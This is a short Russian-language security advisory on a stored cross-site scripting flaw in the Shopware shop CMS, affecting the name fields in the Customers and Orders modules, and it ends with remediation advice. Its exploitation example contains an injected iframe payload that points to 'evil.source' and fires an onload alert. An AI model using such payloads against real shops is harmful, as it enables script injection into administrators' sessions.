В популярной CMS Shopware для создания интернет-магазинов обнаружена XSS уязвимость - Cross-Site Scripting (межсайтовый скриптинг).

Shopware - это модульная система интернет-магазина, разрабатываемая с 2004 года. Повзоляет создавать кластерные интернет-магазины и интегрировать их со сторонними сервисами - онлайн оплаты, ERP-системами и д.р.

XSS - это тип атаки на веб-системы, заключающийся во внедрении в выдаваемую веб-системой страницу вредоносного кода, который будет выполнен на компьютере пользователя при открытии им этой страницы, и взаимодействии этого кода с веб-сервером злоумышленника.

Уязвмиость содержится в модулях: Customers и Orders.

Уязвимые параметры: Firstname, Lastname и Order Name.

Пример эксплуатации уязвимости:

<div class="x-window x-customer-detail-window x-layer x-window-default x-closable x-window-closable x-window-default-closable" style="width: 1093px;height: 458px" id="customer-detail-window-2311">
<div style="width: 1093px" class="x-window-header x-window-header-draggable
x-docked x-window-header-default x-horizontal x-window-header-horizontal x-window-header-default-horizontal x-top
x-window-header-top x-window-header-default-top x-docked-top x-window-header-docked-top x-window-header-default-docked-top
x-unselectable" id="customer-detail-window-2311_header"><div style="width: 1091px" id="customer-detail-window-2311_header-body" class="x-window-header-body x-window-header-body-default x-window-header-body-horizontal x-window-header-body-default-horizontal
x-window-header-body-top x-window-header-body-default-top x-window-header-body-docked-top x-window-header-body-default-docked-top
x-window-header-body-default-horizontal x-window-header-body-default-top x-window-header-body-default-docked-top x-box-layout-ct">
<div style="width: 1066px;height: 154px" id="customer-detail-window-2311_header-innerCt" class="x-box-inner " role="presentation"><div id="customer-detail-window-2311_header-targetEl" style="width:20000px;height:1px"><div class="x-component x-window-header-text-container x-box-item x-component-default" style="text-align: left;margin: 0px;width: 1049px" id="customer-detail-window-2311_header_hd">
<span id="customer-detail-window-2311_header_hd-textEl" class="x-window-header-text x-window-header-text-default">
Kundenkonto: Mar'Da"&gt;&lt;iframe src=&quot;evil.source&quot; onload=&quot;alert(&quot;PTEST&quot;)[PERSISTENT SCRIPT CODE EXECUTION!]&quot; &lt;iframe src=evil.source onload=alert(&quot;PTEST&quot;)[PERSISTENT SCRIPT CODE EXECUTION!] &lt; (20019)</span></div>
<div class="x-tool x-box-item x-tool-default" style="width: 15px;height: 15px;margin: 0px" id="tool-2312">
<img id="tool-2312-toolEl" src="image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="x-tool-close" role="presentation"></div></div></div></div>

Для устранения уязвимости необходимо обновить CMS Shopware до последний версии.

Использование Web Application Firewall позволяет блокировать подобные атаки.